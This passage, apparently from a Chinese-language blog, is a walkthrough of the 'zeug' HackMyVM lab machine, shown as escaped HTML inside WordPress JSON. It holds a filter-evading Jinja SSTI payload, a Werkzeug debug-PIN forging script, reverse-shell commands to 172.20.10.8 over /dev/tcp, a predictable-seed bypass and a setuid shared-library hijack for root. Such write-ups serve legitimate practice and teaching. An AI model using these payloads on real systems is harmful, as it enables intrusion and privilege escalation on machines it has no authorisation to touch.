src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826207.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240328160430291\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6267\u884c\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">{{lipsum.__globals__.__builtins__.eval(&quot;__im&quot;&quot;port__(&#039;o&#039;&#039;s&#039;).pop&quot;&quot;en(&#039;bash rev.sh&#039;).read()&quot;)}}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826208.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826208.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240328160917535\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u62ff\u5230shell\u4e86\uff01<\/p>\n<h3>\u65b9\u6cd5\u4e8c\uff1a\u7834\u89e3PIN<\/h3>\n<p>\u8fd9\u91cc\u6211\u56e0\u4e3a\u6709\u4e8b\u60c5\u65ad\u5f00\u4e86\uff0c\u91cd\u542f\u4ee5\u540e\u6539\u7528\u6865\u63a5\u65b9\u4fbf\u5728\u672c\u673a\u4e0a\u64cd\u4f5c\u4e86\uff0c\u4e0d\u5f71\u54cd\u4efb\u4f55\u4e1c\u897f\u3002<\/p>\n<p>\u56e0\u4e3a<code>debug<\/code>\u5f00\u542f\u4e86\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u8bbf\u95ee<code>console<\/code>\uff0c\u4f46\u662f\u9700\u8981 pin \u7801\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826209.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826209.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240328155306443\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u8fd9\u4e2apin\u5b58\u5728\u6f0f\u6d1e\u53ef\u4ee5\u83b7\u53d6\uff1a<a href=\"https:\/\/github.com\/wdahlenburg\/werkzeug-debug-console-bypass\">https:\/\/github.com\/wdahlenburg\/werkzeug-debug-console-bypass<\/a><\/p>\n<pre><code class=\"language-python\"># get_pin.py\nimport hashlib\nfrom itertools import chain\n\nprobably_public_bits = [\n    &#039;user&#039;,\n    &#039;flask.app&#039;,\n    &#039;Flask&#039;,\n    &#039;\/usr\/local\/lib\/python3.5\/dist-packages\/flask\/app.py&#039;\n]\n\nprivate_bits = [\n    &#039;279275995014060&#039;,\n    &#039;d4e6cb65d59544f3331ea0425dc555a1&#039;\n]\n\nh = hashlib.sha1() # or hashlib.md5()\nfor bit in chain(probably_public_bits, private_bits):\n    if not bit:\n        continue\n    if isinstance(bit, str):\n        bit = bit.encode(&#039;utf-8&#039;)\n    h.update(bit)\nh.update(b&#039;cookiesalt&#039;)\n#h.update(b&#039;shittysalt&#039;)\n\ncookie_name = &#039;__wzd&#039; + h.hexdigest()[:20]\n\nnum = None\nif num is None:\n    h.update(b&#039;pinsalt&#039;)\n    num = (&#039;%09d&#039; % int(h.hexdigest(), 16))[:9]\n\nrv =None\nif rv is None:\n    for group_size in 5, 4, 3:\n        if len(num) % group_size == 0:\n            rv = &#039;-&#039;.join(num[x:x + group_size].rjust(group_size, &#039;0&#039;)\n                          for x in range(0, len(num), group_size))\n            break\n    else:\n        rv = num\n\nprint(rv)<\/code><\/pre>\n<p>\u6211\u4eec\u9700\u8981\u4fee\u6539\u56db\u4e2a\u5730\u65b9\uff1a<\/p>\n<pre><code class=\"language-python\">probably_public_bits = [\n    &#039;user&#039;,                                                           # 1\n    &#039;flask.app&#039;,                                                  \n    &#039;Flask&#039;,                                                      \n    &#039;\/usr\/local\/lib\/python3.5\/dist-packages\/flask\/app.py&#039;         # 2\n]\n\nprivate_bits = [\n    &#039;279275995014060&#039;,                                                # 3 \n    &#039;d4e6cb65d59544f3331ea0425dc555a1&#039;                                # 4\n]<\/code><\/pre>\n<h4>\u7528\u6237\u540d\u4fe1\u606f<\/h4>\n<p>\u524d\u9762\u6709\u4e00\u4e2a\u62a5\u9519\uff1a<\/p>\n<pre><code class=\"language-text\">Error: File: \/home\/cosette\/zeug\/venv\/lib\/python3.11\/site-packages\/flask\/app.py - Template contains restricted words: init<\/code><\/pre>\n<p>\u6240\u4ee5\u5f88\u660e\u663e\uff0c\u7528\u6237\u540d\u4e3a\uff1a<code>cosette<\/code><\/p>\n<h4>app.py \u5730\u5740\u4fe1\u606f<\/h4>\n<p><code>\/home\/cosette\/zeug\/venv\/lib\/python3.11\/site-packages\/flask\/app.py<\/code><\/p>\n<h4>MAC\u5730\u5740\u4fe1\u606f<\/h4>\n<p><code>#3<\/code> \u7684\u5185\u5bb9\u9700\u8981\u7684\u662fmac\u5730\u5740\u4fe1\u606f\uff1a\u6211\u7684\u662f<code>08:00:27:25:b4:6c<\/code>\uff0c\u4f7f\u7528python\u8f6c\u6362\u4e00\u4e0b\u8fdb\u5236\u5373\u53ef\uff1a<\/p>\n<pre><code class=\"language-python\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ python3                 \nPython 3.11.8 (main, Feb  7 2024, 21:52:08) [GCC 13.2.0] on linux\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n>&gt;&gt; print(0x08002725b46c)   # \u5c06\u5192\u53f7\u53bb\u6389\u6700\u524d\u9762\u52a0\u4e0a0x\u5373\u53ef\n8796749804652<\/code><\/pre>\n<h4>Machine ID<\/h4>\n<p>\u6b63\u5e38\u60c5\u51b5\u53ef\u4ee5\u4f7f\u7528\u811a\u672c\u83b7\u53d6\uff1a<\/p>\n<pre><code class=\"language-python\">machine_id = b&quot;&quot;\nfor filename in &quot;\/etc\/machine-id&quot;, &quot;\/proc\/sys\/kernel\/random\/boot_id&quot;:\n    try:\n        with open(filename, &quot;rb&quot;) as f:\n            value = f.readline().strip()\n    except OSError:\n        continue\n\n    if value:\n        machine_id += value\n        break\ntry:\n    with open(&quot;\/proc\/self\/cgroup&quot;, &quot;rb&quot;) as f:\n        machine_id += f.readline().strip().rpartition(b&quot;\/&quot;)[2]\nexcept OSError:\n    pass\n\nprint(machine_id)<\/code><\/pre>\n<p>\u4f46\u662f\u6211\u4eec\u8fd9\u8fb9\u662f\u4e0a\u4f20\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u6784\u9020payload\u83b7\u53d6\uff1a<\/p>\n<pre><code class=\"language-python\">{{ get_flashed_messages.__globals__.__builtins__.open(&quot;\/etc\/machine-id&quot;).read() }}\n# &lt;html&gt; &lt;head&gt; HelloWorld! &lt;\/head&gt; &lt;body&gt; 48329e233f524ec291cce7479927890b &lt;\/body&gt; &lt;\/html&gt;\n{{ get_flashed_messages.__globals__.__builtins__.open(&quot;\/proc\/sys\/kernel\/random\/boot_id&quot;).read() }}\n# &lt;html&gt; &lt;head&gt; HelloWorld! &lt;\/head&gt; &lt;body&gt; 3f935d08-760e-4f78-aa51-e59eac98390a &lt;\/body&gt; &lt;\/html&gt;\n{{ get_flashed_messages.__globals__.__builtins__.open(&quot;\/proc\/self\/cgroup&quot;).read() }}\n# &lt;html&gt; &lt;head&gt; HelloWorld! &lt;\/head&gt; &lt;body&gt; 0::\/system.slice\/zeug-app.service &lt;\/body&gt; &lt;\/html&gt;<\/code><\/pre>\n<p>\u521b\u5efa\u6587\u4ef6\uff0c\u653e\u5165\u6211\u4eec\u641c\u96c6\u5230\u7684\u4fe1\u606f\uff0c\u66f4\u6539\u4e00\u4e0b\u811a\u672c\uff0c\u7136\u540e\u8fd0\u884c\uff1a<\/p>\n<pre><code class=\"language-python\">machine_id = b&quot;&quot;\nfor filename in &quot;machine-id&quot;, &quot;boot_id&quot;:\n    try:\n        with open(filename, &quot;rb&quot;) as f:\n            value = f.readline().strip()\n    except OSError:\n        continue\n\n    if value:\n        machine_id += value\n        break\ntry:\n    with open(&quot;cgroup&quot;, &quot;rb&quot;) as f:\n        machine_id += f.readline().strip().rpartition(b&quot;\/&quot;)[2]\nexcept OSError:\n    pass\n\nprint(machine_id)<\/code><\/pre>\n<p>\u8fd0\u884c\u7ed3\u679c\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ echo &quot;48329e233f524ec291cce7479927890b&quot; &gt; machine-id\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ echo &quot;3f935d08-760e-4f78-aa51-e59eac98390a&quot; &gt; boot_id\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ echo &quot;0::\/system.slice\/zeug-app.service&quot; &gt; cgroup    \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ vim mi.py    \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ chmod +x mi.py  \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ python3 mi.py           \nb&#039;48329e233f524ec291cce7479927890bzeug-app.service&#039;<\/code><\/pre>\n<h4>\u66f4\u6539\u6574\u4f53\u811a\u672c<\/h4>\n<pre><code class=\"language-python\"># get_pin.py\nimport hashlib\nfrom itertools import chain\n\nprobably_public_bits = [\n    &#039;cosette&#039;,\n    &#039;flask.app&#039;,\n    &#039;Flask&#039;,\n    &#039;\/home\/cosette\/zeug\/venv\/lib\/python3.11\/site-packages\/flask\/app.py&#039;\n]\n\nprivate_bits = [\n    &#039;8796749804652&#039;,\n    &#039;48329e233f524ec291cce7479927890bzeug-app.service&#039;\n]\n\nh = hashlib.sha1() # or hashlib.md5()\nfor bit in chain(probably_public_bits, private_bits):\n    if not bit:\n        continue\n    if isinstance(bit, str):\n        bit = bit.encode(&#039;utf-8&#039;)\n    h.update(bit)\nh.update(b&#039;cookiesalt&#039;)\n#h.update(b&#039;shittysalt&#039;)\n\ncookie_name = &#039;__wzd&#039; + h.hexdigest()[:20]\n\nnum = None\nif num is None:\n    h.update(b&#039;pinsalt&#039;)\n    num = (&#039;%09d&#039; % int(h.hexdigest(), 16))[:9]\n\nrv =None\nif rv is None:\n    for group_size in 5, 4, 3:\n        if len(num) % group_size == 0:\n            rv = &#039;-&#039;.join(num[x:x + group_size].rjust(group_size, &#039;0&#039;)\n                          for x in range(0, len(num), group_size))\n            break\n    else:\n        rv = num\n\nprint(rv)<\/code><\/pre>\n<p>\u8fd0\u884c\u5f97\u5230 pin \u7801\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ vim get-pin.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ chmod +x get-pin.py \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ python3 get-pin.py \n367-506-961<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826210.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826210.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240328165626788\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u4e0d\u77e5\u9053\u54ea\u91cc\u51fa\u9519\u4e86\u3002\u3002\u3002\u3002\u5220\u9664\u673a\u5668\uff0c\u91cd\u65b0\u5bfc\u5165\u673a\u5668\u5e76\u4e3a\u673a\u5668\u6240\u6709\u7f51\u5361\u91cd\u65b0\u8d4b\u4e88MAC\u5730\u5740\u3002<\/p>\n<p>\u518d\u6b21\u5c1d\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826211.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826211.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240328172650120\" \/><\/div><\/p>\n<p>\u6210\u529f\uff01<\/p>\n<h3>Console RCE<\/h3>\n<pre><code class=\"language-python\">__import__(&#039;os&#039;).popen(&#039;whoami&#039;).read();\n__import__(&#039;os&#039;).system(&quot;bash -i &gt;&amp; \/dev\/tcp\/172.20.10.8\/1234 0&gt;&amp;1&quot;)\n__import__(&#039;os&#039;).system(&#039;bash -c &quot;bash -i &gt;&amp; \/dev\/tcp\/172.20.10.8\/1234 0&gt;&amp;1&quot;&#039;)<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826212.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826212.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240328173404084\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826214.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826214.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240328174036683\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u67e5\u770bseed_back<\/h3>\n<pre><code class=\"language-bash\">file seed_bak     \nseed_bak: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=403ea35a235b0a4c74f7977580b4ef46fcd0f044, for GNU\/Linux 4.4.0, not stripped<\/code><\/pre>\n<p>\u4e22\u8fdb<code>ida<\/code>\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-c\">\/\/ main.c\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  int v4; \/\/ [rsp+Ch] [rbp-14h]\n  int v5; \/\/ [rsp+10h] [rbp-10h]\n  int v6; \/\/ [rsp+14h] [rbp-Ch]\n  unsigned __int64 v7; \/\/ [rsp+18h] [rbp-8h]\n\n  v7 = __readfsqword(0x28u);\n  banner(*(_QWORD *)&amp;argc, argv, envp);\n  srand(1u);\n  v5 = rand();\n  v6 = -559038737;\n  v4 = 0;\n  printf(&quot;Enter a number: &quot;);\n  __isoc99_scanf(&quot;%d&quot;, &amp;v4);\n  if ( v6 == (v5 ^ v4) )\n    system(&quot;\/bin\/bash&quot;);\n  else\n    puts(&quot;Wrong.&quot;);\n  return 0;\n}<\/code><\/pre>\n<h3>\u4f2a\u968f\u673a\u6570+\u5207\u6362exia\u7528\u6237<\/h3>\n<p>\u662f\u4e00\u4e2a\u4f2a\u968f\u673a\u6570\uff0c\u5199\u4e00\u4e2a\u811a\u672c\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-c\">#include &lt;stdio.h&gt;\n#include &lt;stdlib.h&gt;\nint main() {\n    srand(1u);\n    int v5 = rand();\n    int v6 = -559038737;\n    printf(&quot;%d\\n&quot;, v5 ^ v6);\n    return 0;\n}\n\/\/ -1255736440<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826215.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826215.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240328180730702\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u4e8c\u6b21\u63d0\u6743<\/h3>\n<h4>\u4fe1\u606f\u641c\u96c6<\/h4>\n<pre><code class=\"language-bash\">exia@zeug:\/home\/cosette$ cd \/home\/exia\nexia@zeug:~$ ls -la\ntotal 44\ndrwx------ 3 exia exia  4096 Jan  6 23:23 .\ndrwxr-xr-x 4 root root  4096 Jan  6 19:28 ..\nlrwxrwxrwx 1 exia exia     9 Jan  6 23:23 .bash_history -&gt; \/dev\/null\n-rwx------ 1 exia exia   220 Apr 23  2023 .bash_logout\n-rwx------ 1 exia exia  3526 Apr 23  2023 .bashrc\ndrwx------ 3 exia exia  4096 Jan  6 21:46 .local\n-rwx------ 1 exia exia   807 Apr 23  2023 .profile\n-rwx------ 1 exia exia 15744 Jan  6 21:59 seed\n-rwx------ 1 exia exia    38 Jan  6 22:14 user.txt\nexia@zeug:~$ cat user.txt\nHMYVM{exia_1XZ2GUy6gwSRwXwFUKEkZC6cT}\nexia@zeug:~$ sudo -l\nMatching Defaults entries for exia on zeug:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser exia may run the following commands on zeug:\n    (root) NOPASSWD: \/usr\/bin\/zeug<\/code><\/pre>\n<h4>\u53cd\u7f16\u8bd1zeug<\/h4>\n<pre><code class=\"language-c\">\/\/ main.c\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  if ( dlopen(&quot;\/home\/exia\/exia.so&quot;, 2) )\n    return 0;\n  fwrite(&quot;Error opening file\\n&quot;, 1uLL, 0x13uLL, _bss_start);\n  return 1;\n}<\/code><\/pre>\n<p>\u5b83\u8fd0\u884c\u4e86<code>\/home\/exia.so<\/code>\u76ee\u5f55\u4e0b\u7684\u94fe\u63a5\u5e93\u6587\u4ef6\uff0c\u5c1d\u8bd5\u8fdb\u884c<a href=\"https:\/\/exploit-notes.hdks.org\/exploit\/linux\/privilege-escalation\/sudo\/sudo-privilege-escalation-by-overriding-shared-library\/\">\u52ab\u6301\u5229\u7528<\/a>\uff1a<\/p>\n<pre><code class=\"language-c\">\/\/ exia.c\n#include &lt;stdio.h&gt;\n#include &lt;stdlib.h&gt;\n#include &lt;unistd.h&gt;\n\nvoid inject()__attribute__((constructor));\n\nvoid inject() {\n    unsetenv(&quot;LD_PRELOAD&quot;);\n    setuid(0);\n    setgid(0);\n    system(&quot;\/bin\/bash&quot;);\n}<\/code><\/pre>\n<p>\u7136\u540e\u7f16\u8bd1\u4e3a\u94fe\u63a5\u5e93\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">gcc  -fPIC -shared -o exia.so exia.c<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826216.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826216.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240328182210680\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f20\u8fc7\u53bb\uff0c\u8fd0\u884c\u83b7\u5f97root\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826217.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826217.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240328182504876\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h4>\u5bfb\u627eflag<\/h4>\n<pre><code class=\"language-text\">exia@zeug:~$ sudo \/usr\/bin\/zeug\nroot@zeug:\/home\/exia# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@zeug:\/home\/exia# cd \/root\nroot@zeug:~# ls -la\ntotal 32\ndrwx------  4 root root 4096 Jan  6 23:52 .\ndrwxr-xr-x 18 root root 4096 Jan  6 13:28 ..\nlrwxrwxrwx  1 root root    9 Jan  6 23:20 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc\n-rw-------  1 root root   20 Jan  6 22:40 .lesshst\ndrwxr-xr-x  3 root root 4096 Jan  6 13:52 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-------  1 root root    0 Jan  6 15:13 .python_history\n-rw-r--r--  1 root root   38 Jan  6 23:06 root.txt\ndrwx------  2 root root 4096 Jan  6 23:52 .ssh\nroot@zeug:~# cat root.txt \nHMYVM{root_Ut9RX5o7iZVKXjrOgcGW3fxBq}<\/code><\/pre>\n<h2>\u53c2\u8003blog<\/h2>\n<p><a href=\"https:\/\/www.cnblogs.com\/bmjoker\/p\/13508538.html\">https:\/\/www.cnblogs.com\/bmjoker\/p\/13508538.html<\/a><\/p>\n<p><a href=\"https:\/\/moonsec.top\/articles\/108\">https:\/\/moonsec.top\/articles\/108<\/a><\/p>\n<p><a href=\"https:\/\/hackmanit.de\/en\/blog-en\/178-template-injection-vulnerabilities-understand-detect-identify\">https:\/\/hackmanit.de\/en\/blog-en\/178-template-injection-vulnerabilities-understand-detect-identify<\/a><\/p>\n<p><a href=\"https:\/\/wiki.wgpsec.org\/knowledge\/ctf\/SSTI.html\">https:\/\/wiki.wgpsec.org\/knowledge\/ctf\/SSTI.html<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>zeug \u5bfc\u5165\u9776\u573a\u65f6\uff0c\u5efa\u8bae\u4f7f\u7528\u4e3a\u6240\u6709\u7f51\u5361\u91cd\u65b0\u751f\u6210MAC\u5730\u5740\u3002 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf nmap -sCV 10.0 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,22],"tags":[],"class_list":["post-471","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-reverse"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/471","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=471"}],"version-history":[{"cou